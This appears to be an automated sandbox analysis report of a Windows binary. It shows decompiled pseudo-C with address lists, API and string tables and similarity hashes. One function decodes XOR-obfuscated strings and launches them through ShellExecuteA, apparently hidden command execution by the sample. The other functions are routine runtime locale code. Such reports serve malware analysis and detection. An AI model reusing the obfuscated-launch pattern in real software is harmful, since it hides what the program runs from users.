				do {
					_t8 = _t90 + 0x40; // 0x40
					 *(_t161 + _t90 + 0x20) =  *(_t161 + _t90 + 0x20) ^ _t8;
					_t90 = _t90 + 1;
				} while (_t90 < 0x18);
				_t91 = _t161 + 0x20;
				 *((char*)(_t161 + 0x38)) = 0;
				_t123 = _t129 - _t91;
				do {
					_t60 =  *_t91;
					 *((char*)(_t123 + _t91)) = _t60;
					_t91 = _t91 + 1;
				} while (_t60 != 0);
				_t152 = _t85;
				do {
					_t61 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t61 != 0);
				_t86 = _t85 - _t152;
				_t130 = _t129 - 1;
				do {
					_t62 =  *(_t130 + 1);
					_t130 = _t130 + 1;
				} while (_t62 != 0);
				 *((intOrPtr*)(_t161 + 0x10)) = 0x31366e60;
				_t93 = _t86 >> 2;
				memcpy(_t130, _t152, _t93 << 2);
				_t162 = _t161 + 0xc;
				 *((short*)(_t162 + 0x14)) = 0x64;
				memcpy(_t152 + _t93 + _t93, _t152, _t86 & 0x00000003);
				_t163 = _t162 + 0xc;
				_t98 = 0;
				do {
					_t20 = _t98 + 0x40; // 0x40
					 *(_t163 + _t98 + 0x10) =  *(_t163 + _t98 + 0x10) ^ _t20;
					_t98 = _t98 + 1;
				} while (_t98 < 5);
				_t25 = _t163 + 0x10; // 0x31366e60
				_t124 = _t25;
				 *((char*)(_t163 + 0x15)) = 0;
				_t153 = _t124;
				do {
					_t66 =  *_t124;
					_t124 = _t124 + 1;
				} while (_t66 != 0);
				_t87 =  *(_t163 + 0x18);
				_t125 = _t124 - _t153;
				_t135 = _t87 - 1;
				do {
					_t67 =  *(_t135 + 1);
					_t135 = _t135 + 1;
				} while (_t67 != 0);
				_t100 = _t125 >> 2;
				memcpy(_t135, _t153, _t100 << 2);
				memcpy(_t153 + _t100 + _t100, _t153, _t125 & 0x00000003);
				_t165 = _t163 + 0x18;
				_t154 = _t158;
				do {
					_t70 =  *_t158;
					_t158 = _t158 + 1;
				} while (_t70 != 0);
				_t159 = _t158 - _t154;
				_t140 = _t87 - 1;
				do {
					_t71 =  *(_t140 + 1);
					_t140 = _t140 + 1;
				} while (_t71 != 0);
				asm("movaps xmm0, [0xb3def0]");
				_t106 = _t159 >> 2;
				memcpy(_t140, _t154, _t106 << 2);
				_t166 = _t165 + 0xc;
				 *((intOrPtr*)(_t166 + 0x40)) = 0x5a5b5859;
				 *((intOrPtr*)(_t166 + 0x44)) = 0x475f505e;
				asm("movups [esp+0x20], xmm0");
				 *((short*)(_t166 + 0x48)) = 0xf47;
				asm("movaps xmm0, [0xb3dee0]");
				_t73 = memcpy(_t154 + _t106 + _t106, _t154, _t159 & 0x00000003);
				_t167 = _t166 + 0xc;
				asm("movups [esp+0x30], xmm0");
				 *(_t167 + 0x4a) = _t73;
				_t111 = 0;
				do {
					_t38 = _t111 + 0x40; // 0x40
					 *(_t167 + _t111 + 0x20) =  *(_t167 + _t111 + 0x20) ^ _t38;
					_t111 = _t111 + 1;
				} while (_t111 < 0x2a);
				_t126 = _t167 + 0x20;
				 *(_t167 + 0x4a) = 0;
				_t155 = _t126;
				do {
					_t75 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t75 != 0);
				_t127 = _t126 - _t155;
				_t145 = _t87 - 1;
				do {
					_t76 =  *(_t145 + 1);
					_t145 = _t145 + 1;
				} while (_t76 != 0);
				 *((intOrPtr*)(_t167 + 0x10)) = 0x6d262c23;
				_t113 = _t127 >> 2;
				_t78 = memcpy(_t145, _t155, _t113 << 2);
				_t168 = _t167 + 0xc;
				 *((intOrPtr*)(_t168 + 0x14)) = 0x233d21;
				 *((intOrPtr*)(_t168 + 0x18)) = 0x2d27312f;
				_t79 = memcpy(_t155 + _t113 + _t113, _t155, _t127 & 0x00000003);
				_t169 = _t168 + 0xc;
				 *(_t168 + 0x34) = _t79;
				_t80 = E00B46346(_t169 + 0x1c);
				ShellExecuteA(0, E00B432BE(_t169 + 0x28), _t80, _t87, _t79, _t78);
				return E00B4AE43( *(_t169 + 0x4c) ^ _t169);
			}

0x00b499c8
0x00b499cf
0x00b499d4
0x00b499d9
0x00b499df
0x00b499e4
0x00b499e9
0x00b499f0
0x00b499f3
0x00b499f7
0x00b499f9
0x00b499fe
0x00b49a06
0x00b49a0e
0x00b49a13
0x00b49a13
0x00b49a16
0x00b49a1a
0x00b49a1b
0x00b49a20
0x00b49a24
0x00b49a2d
0x00b49a2f
0x00b49a2f
0x00b49a31
0x00b49a34
0x00b49a35
0x00b49a39
0x00b49a3b
0x00b49a3b
0x00b49a3d
0x00b49a3e
0x00b49a42
0x00b49a44
0x00b49a45
0x00b49a45
0x00b49a48
0x00b49a49
0x00b49a4f
0x00b49a57
0x00b49a5a
0x00b49a5a
0x00b49a5e
0x00b49a68
0x00b49a68
0x00b49a6a
0x00b49a6c
0x00b49a6c
0x00b49a6f
0x00b49a73
0x00b49a74
0x00b49a79
0x00b49a79
0x00b49a7d
0x00b49a82
0x00b49a84
0x00b49a84
0x00b49a86
0x00b49a87
0x00b49a8b
0x00b49a8f
0x00b49a91
0x00b49a94
0x00b49a94
0x00b49a97
0x00b49a98
0x00b49a9e
0x00b49aa1
0x00b49aa8
0x00b49aa8
0x00b49aaa
0x00b49aac
0x00b49aac
0x00b49aaf
0x00b49ab0
0x00b49ab4
0x00b49ab6
0x00b49ab9
0x00b49ab9
0x00b49abc
0x00b49abd
0x00b49ac1
0x00b49aca
0x00b49acd
0x00b49acd
0x00b49ad1
0x00b49adc
0x00b49ae4
0x00b49ae9
0x00b49af0
0x00b49af7
0x00b49af7
0x00b49af9
0x00b49afe
0x00b49b02
0x00b49b04
0x00b49b04
0x00b49b07
0x00b49b0b
0x00b49b0c
0x00b49b11
0x00b49b15
0x00b49b1a
0x00b49b1c
0x00b49b1c
0x00b49b1e
0x00b49b1f
0x00b49b23
0x00b49b25
0x00b49b28
0x00b49b28
0x00b49b2b
0x00b49b2c
0x00b49b32
0x00b49b3a
0x00b49b3f
0x00b49b3f
0x00b49b43
0x00b49b4e
0x00b49b57
0x00b49b57
0x00b49b5f
0x00b49b63
0x00b49b75
0x00b49b8d

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B49B75

Strings

!=#, xrefs: 00B49B43
1%7s, xrefs: 00B499FE
`n61, xrefs: 00B49A79
^P_G, xrefs: 00B49ADC
{!8w, xrefs: 00B49A06
YX[Z, xrefs: 00B49AD1
/1'-, xrefs: 00B49B4E

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$/1'-$1%7s$YX[Z$^P_G$`n61${!8w
API String ID: 587946157-266102048
Opcode ID: d8ef038593224ddf965ddcee9b7ca68e81a9d6928fbfadc48686e7bd5cf9c48f
Instruction ID: fa0403e4fa46675231ce230df45d2f306ceae1ad49c2116fade0a2db004d0afa
Opcode Fuzzy Hash: d8ef038593224ddf965ddcee9b7ca68e81a9d6928fbfadc48686e7bd5cf9c48f
Instruction Fuzzy Hash: EA5117711087854BCB19CF28949066FFFE1FFDA344F44069DE9C65B212DB629A0AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B5CB6A, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B5CB6A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				short _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E00B5830D(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E00B5CAFB(0xb360a0, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E00B5C460(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E00B5C584();
					} else {
						E00B5C4E9(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E00B5CAFB(0xb35d90, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E00B5C584();
							} else {
								E00B5C4E9(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E00B5C9B4(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xb540cc
							_t87 = _t15;
							 *_t87 = 0;
							_t115 = _t96 + 2;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t98 = _t96 - _t115 >> 1;
							_push((_t96 - _t115 >> 1) + 1);
							_t47 = E00B598A4(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00B52919();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0xb69014; // 0x26ce9e99
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E00B5830D(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E00B5830D(_t98, _t115) + 0x34c);
								_t128 = E00B5D2AD(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00B5BE5E(_t88, _t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E00B5D3E1(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E00B4AE43(_v32 ^ _t131);
							} else {
								if(E00B5DBF9(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0xb5402c
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xb540cc
									if(E00B5DBF9(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E00B652C7(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xb540cc
											if(E00B5DBF9(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E00B652C7(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E00B552AD(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E00B598A4(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00b5cb6f
0x00b5cb70
0x00b5cb71
0x00b5cb72
0x00b5cb75
0x00b5cb76
0x00b5cb77
0x00b5cb7e
0x00b5cb80
0x00b5cb83
0x00b5cb83
0x00b5cb86
0x00b5cb86
0x00b5cb8c
0x00b5cb8f
0x00b5cb92
0x00b5cb92
0x00b5cb95
0x00b5cb98
0x00b5cb9a
0x00b5cba0
0x00b5cba2
0x00b5cba7
0x00b5cbb1
0x00b5cbb6
0x00b5cbb8
0x00b5cbbb
0x00b5cbbb
0x00b5cbbd
0x00b5cbc1
0x00b5cc0a
0x00000000
0x00b5cbc3
0x00b5cbc8
0x00b5cbd1
0x00b5cbca
0x00b5cbca
0x00b5cbca
0x00b5cbdc
0x00b5cbe6
0x00b5cbeb
0x00b5cbf0
0x00b5cbf6
0x00b5cbfa
0x00b5cc03
0x00b5cbfc
0x00b5cbfc
0x00b5cbfc
0x00b5cc0f
0x00b5cc0f
0x00b5cbf0
0x00b5cbdc
0x00b5cc15
0x00b5cd51
0x00b5cd51
0x00000000
0x00b5cc1b
0x00b5cc1b
0x00b5cc24
0x00b5cc35
0x00b5cc2b
0x00b5cc2b
0x00b5cc2b
0x00b5cc3c
0x00b5cc40
0x00000000
0x00b5cc64
0x00b5cc64
0x00b5cc69
0x00b5cc6b
0x00b5cc6b
0x00b5cc6d
0x00b5cc72
0x00b5cd4c
0x00b5cd4e
0x00b5cd53
0x00b5cd59
0x00b5cc78
0x00b5cc78
0x00b5cc7b
0x00b5cc7b
0x00b5cc83
0x00b5cc86
0x00b5cc89
0x00b5cc89
0x00b5cc8c
0x00b5cc8f
0x00b5cc97
0x00b5cc9c
0x00b5cca3
0x00b5cca8
0x00b5ccad
0x00b5cd5a
0x00b5cd5c
0x00b5cd5d
0x00b5cd5e
0x00b5cd5f
0x00b5cd60
0x00b5cd61
0x00b5cd66
0x00b5cd6a
0x00b5cd72
0x00b5cd79
0x00b5cd7c
0x00b5cd7d
0x00b5cd81
0x00b5cd82
0x00b5cd87
0x00b5cd8f
0x00b5cd9e
0x00b5cdaa
0x00b5cdbb
0x00b5cdc3
0x00b5cddd
0x00b5cdea
0x00b5cded
0x00b5cdf0
0x00b5cdf0
0x00b5cdc5
0x00b5cdc5
0x00b5cdc7
0x00b5ce0d
0x00b5ccb3
0x00b5ccc3
0x00000000
0x00b5ccc9
0x00b5cccb
0x00b5cccb
0x00b5ccd7
0x00b5cce5
0x00000000
0x00b5cce7
0x00b5cce7
0x00b5ccea
0x00b5ccf0
0x00b5ccf3
0x00b5cd03
0x00b5cd08
0x00b5cd16
0x00000000
0x00000000
0x00000000
0x00000000
0x00b5ccf5
0x00b5ccf5
0x00b5ccf8
0x00b5ccfe
0x00b5cd01
0x00b5cd18
0x00b5cd18
0x00b5cd24
0x00b5cd44
0x00000000
0x00b5cd26
0x00b5cd26
0x00b5cd30
0x00b5cd35
0x00b5cd3a
0x00000000
0x00b5cd3c
0x00000000
0x00b5cd3c
0x00b5cd3a
0x00000000
0x00000000
0x00000000
0x00b5cd01
0x00b5ccf3
0x00b5cce5
0x00b5ccc3
0x00b5ccad
0x00b5cc72
0x00b5cc40

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(00000000,00000001,00000004,00B51A0E,00000001,00000000,00000002,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B583B0

GetACP.KERNEL32(00000055,?,?,?,?,?,00B53FAC,?,?,?,?,?,?,00000004), ref: 00B5CC2B
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,00B53FAC,?,?,?,?,?,?,00000004), ref: 00B5CC56
_wcschr.LIBVCRUNTIME ref: 00B5CCEA
_wcschr.LIBVCRUNTIME ref: 00B5CCF8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00B53FAC,00000000,00B540CC), ref: 00B5CDBB

Strings

utf8, xrefs: 00B5CD28

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: b664b0eb6279fe14015a5ab2bdcc5e76d54d7dff729faeb59dca3a4d8e5e463e
Instruction ID: ff5509ddad90bb07e797845b30cd96b8304023521e9d6f847df136874270efa7
Opcode Fuzzy Hash: b664b0eb6279fe14015a5ab2bdcc5e76d54d7dff729faeb59dca3a4d8e5e463e
Instruction Fuzzy Hash: E471F831600306AEDB25AB34CC82BBA7BEAEF44712F1441F9FD09D71C1FA74D94986A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D2FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B5D2FE(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0x51ceb70f
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00B56417(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0x51ceb70f
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00b5d303
0x00b5d304
0x00b5d30b
0x00b5d3af
0x00b5d3bd
0x00b5d3c8
0x00b5d3ce
0x00b5d3d3
0x00b5d3d5
0x00b5d3d5
0x00b5d3db
0x00b5d3e0
0x00b5d3e0
0x00b5d3ca
0x00b5d3ca
0x00000000
0x00b5d3ca
0x00b5d311
0x00b5d316
0x00000000
0x00000000
0x00b5d31c
0x00b5d321
0x00b5d323
0x00b5d323
0x00b5d329
0x00000000
0x00000000
0x00b5d32e
0x00b5d345
0x00b5d345
0x00b5d34e
0x00b5d350
0x00000000
0x00000000
0x00b5d352
0x00b5d357
0x00b5d359
0x00b5d359
0x00b5d35f
0x00000000
0x00000000
0x00b5d364
0x00b5d382
0x00b5d384
0x00b5d3a7
0x00000000
0x00b5d3ac
0x00b5d394
0x00b5d39f
0x00000000
0x00000000
0x00b5d3a1
0x00000000
0x00b5d3a1
0x00b5d366
0x00b5d36e
0x00000000
0x00000000
0x00b5d370
0x00b5d373
0x00b5d379
0x00000000
0x00000000
0x00000000
0x00b5d37b
0x00b5d37d
0x00b5d37f
0x00000000
0x00b5d37f
0x00b5d330
0x00b5d338
0x00000000
0x00000000
0x00b5d33a
0x00b5d33d
0x00b5d343
0x00000000
0x00000000
0x00000000
0x00b5d343
0x00b5d349
0x00b5d34b
0x00000000

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00B5D624,?,00000000), ref: 00B5D397
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00B5D624,?,00000000), ref: 00B5D3C0
GetACP.KERNEL32(?,?,00B5D624,?,00000000), ref: 00B5D3D5

Strings

ACP, xrefs: 00B5D31C
OCP, xrefs: 00B5D352

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ec3dca596d71e90e191e6f1ee1a5ace9afac7b5bbfa869f418f372cd2ddf2066
Instruction ID: 3a226356be2a8446338ef9e969f6a735f25352f14d0801560fe79ae7d851e01d
Opcode Fuzzy Hash: ec3dca596d71e90e191e6f1ee1a5ace9afac7b5bbfa869f418f372cd2ddf2066
Instruction Fuzzy Hash: 6E21D332B04100A6E730AF64D801BAB73E6EF40B62B5686E4ED09D7110FB72DE48C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D4D9, Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B5D4D9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0xb69014; // 0x26ce9e99
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00B5830D(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00B5830D(__ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0xb361b4; // 0x17
					E00B5D476(_t91, 0, 0xb360a0, _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E00B5CE10(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E00B5CEF6(_t91, _t99, __eflags,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E00B5D2FE(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
							if(_t108 == 0) {
								L22:
								L23:
								return E00B4AE43(_v8 ^ _t109);
							}
							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t108;
							}
							E00B5DCF7(_v16,  &(_v24[0x94]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xb540c5
							E00B5DCF7(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0xb54025
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb540a5
							E00B552AD(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0xb3609c; // 0x41
						_t76 = E00B5D476(_t91, _t99, 0xb35d90, _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E00B5CEF6(_t91, _t99, __eflags,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t123 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E00B5CE5B(_t91, _t99, _t123,  &_v20);
						goto L15;
					}
					_t119 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E00B5CE5B(_t91, _t99, _t119,  &_v20);
					goto L9;
				}
			}

0x00b5d4e1
0x00b5d4e8
0x00b5d4ef
0x00b5d4f3
0x00b5d4f7
0x00b5d505
0x00b5d50a
0x00b5d50b
0x00b5d50c
0x00b5d50d
0x00b5d515
0x00b5d517
0x00b5d51d
0x00b5d523
0x00b5d526
0x00b5d528
0x00b5d52b
0x00b5d52f
0x00b5d536
0x00b5d543
0x00b5d548
0x00b5d54b
0x00b5d54e
0x00b5d54e
0x00b5d550
0x00b5d553
0x00b5d557
0x00b5d5c7
0x00b5d5c9
0x00b5d5cb
0x00b5d5de
0x00b5d5de
0x00b5d5e5
0x00b5d5eb
0x00b5d5ee
0x00000000
0x00b5d5ee
0x00b5d5cd
0x00b5d5d0
0x00000000
0x00000000
0x00b5d5d6
0x00b5d5db
0x00000000
0x00b5d55e
0x00b5d55e
0x00b5d562
0x00b5d574
0x00b5d578
0x00b5d57d
0x00b5d581
0x00b5d582
0x00b5d60c
0x00b5d60c
0x00b5d60e
0x00b5d61a
0x00b5d624
0x00b5d628
0x00b5d62a
0x00b5d5f9
0x00b5d5fb
0x00b5d60b
0x00b5d60b
0x00b5d630
0x00b5d636
0x00b5d638
0x00000000
0x00000000
0x00b5d63f
0x00b5d645
0x00b5d647
0x00000000
0x00000000
0x00b5d649
0x00b5d64c
0x00b5d64e
0x00b5d650
0x00b5d650
0x00b5d661
0x00b5d666
0x00b5d668
0x00b5d6c8
0x00000000
0x00b5d6ca
0x00b5d66d
0x00b5d677
0x00b5d687
0x00b5d68d
0x00b5d68f
0x00000000
0x00000000
0x00b5d697
0x00b5d6a6
0x00b5d6ac
0x00b5d6ae
0x00000000
0x00000000
0x00b5d6b8
0x00b5d6c0
0x00000000
0x00b5d6c5
0x00b5d588
0x00b5d597
0x00b5d59c
0x00b5d5a1
0x00b5d5f1
0x00b5d5f1
0x00b5d5f1
0x00b5d5f3
0x00b5d5f7
0x00000000
0x00000000
0x00000000
0x00b5d5f7
0x00b5d5a3
0x00b5d5a5
0x00b5d5a9
0x00b5d5bb
0x00b5d5bf
0x00b5d5c4
0x00b5d5c4
0x00000000
0x00b5d5c4
0x00b5d5ab
0x00b5d5ae
0x00000000
